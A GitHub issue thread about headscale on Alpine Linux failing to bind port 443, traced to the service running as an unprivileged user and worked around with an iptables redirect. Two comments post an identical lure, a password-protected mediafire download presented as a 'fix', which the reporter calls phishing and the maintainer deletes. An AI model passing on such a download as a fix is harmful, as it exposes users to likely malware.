### ISSUE TITLE
[Bug] failed to bind to TCP address: listen tcp 0.0.0.0:443: bind: permission denied

### ISSUE THREAD

**Issue by tirenparo** [juanfont/headscale#2094]
### Is this a support request?

- [X] This is not a support request

### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

I'm running headscale on Alpinelinux.

`rc-service headscale start` logs the following on /var/log/headscale.log:
```
An updated version of Headscale has been found (0.23.0-beta3 vs. your current v0.22.3). Check it out https://github.com/juanfont/headscale/releases
2024-08-31T05:26:44Z INF Setting up a DERPMap update worker frequency=86400000
2024-08-31T05:26:44Z FTL github.com/juanfont/headscale/cmd/headscale/cli/server.go:26 > Error starting server error="failed to bind to TCP address: listen tcp 0.0.0.0:443: bind: permission denied"
An updated version of Headscale has been found (0.23.0-beta3 vs. your current v0.22.3). Check it out https://github.com/juanfont/headscale/releases
2024-08-31T05:26:47Z INF Setting up a DERPMap update worker frequency=86400000
2024-08-31T05:26:47Z FTL github.com/juanfont/headscale/cmd/headscale/cli/server.go:26 > Error starting server error="failed to bind to TCP address: listen tcp 0.0.0.0:443: bind: permission denied"
```

The only changes in my config.yaml:
```yml
server_url: http://127.0.0.1:443
listen_addr: 0.0.0.0:443
```

Using `headscale serve` doesn't hit the error. 

### Expected Behavior

`rc-service headscale start` should start the service without errors.

### Steps To Reproduce

```
apk add headscale --repository=https://dl-cdn.alpinelinux.org/alpine/edge/testing

vi /etc/headscale/config.yaml # change port to 443 on server_url and listen_addr

rc-service headscale start
```

### Environment

```markdown
- OS: Alpinelinux x86_64
- Headscale version: 0.22.3
- Tailscale version: -
```

### Runtime environment

- [ ] Headscale is behind a (reverse) proxy
- [ ] Headscale runs in a container

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tirenparo** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue,

This is obviously phishing.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by juanfont** [comment]
I have deleted both comments.

**Comment by kradalby** [comment]
This sounds like the 

rc-service headscale start

Service code is ran with a user or as a process that lack the capability to bind to the ports typically requiring root etc.

Since this is packaged by the alpine people, it's out of our control, so you will need to raise it with them.

You can confirm my theory by trying to run headscale serve as root with your config

**Comment by tirenparo** [comment]
Yes, the problem was that the rc-service is running headscale with user `headscale` so unprivileged ports work fine. There are several ways to workaround this, I choose to use a [port forwarding rule](https://superuser.com/a/1334552).
```
doas iptables -t nat -I OUTPUT -p tcp -d 127.0.0.1 --dport 443 -j REDIRECT --to-ports 8443
```

You can also stick to use a custom port https://your-domain:8443, use nginx or other reverse proxy, or grant low-numbered port access to the headscale process.
